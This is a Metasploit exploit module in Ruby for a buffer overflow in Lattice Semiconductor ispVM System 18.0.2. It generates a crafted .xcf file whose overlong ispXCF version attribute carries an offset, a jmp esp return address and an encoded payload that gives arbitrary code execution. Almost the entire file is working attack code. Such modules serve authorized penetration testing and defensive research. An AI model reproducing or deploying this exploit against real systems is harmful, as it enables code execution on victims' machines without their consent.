metasploit-framework/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Lattice Semiconductor ispVM System XCF File Handling Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in ispVM System 18.0.2.  Due to the way
        ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially
        crafted file, when a long value is supplied for the version attribute of the ispXCF
        tag. It results in arbitrary code execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '82000'],
          ['BID', '53562'],
          ['URL', 'http://secunia.com/advisories/48740/']
        ],
      'Payload'        =>
        {
          'Space'    => 4000,
          'BadChars' => "\x00\x1a\x3c\x20\x3e\xff"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 274,
              'BreakOffset' => 243,
              'Ret' => 0x780e9d6e # jmp esp from C:\ispTOOLS\ispvmsystem\MSVCP60.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 16 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.xcf']),
      ])

  end

  def exploit

    buf = rand_text(target['Offset'])
    buf[target['BreakOffset']] = "A"
    buf << [target.ret].pack("V")
    buf << payload.encoded

    xcf = %Q|
    <?xml version='1.0' encoding='utf-8' ?>
    <!DOCTYPE		ispXCF	SYSTEM	"IspXCF.dtd" >
    <ispXCF version="#{buf}">
    </ispXCF>
    |

    file_create(xcf)
  end
end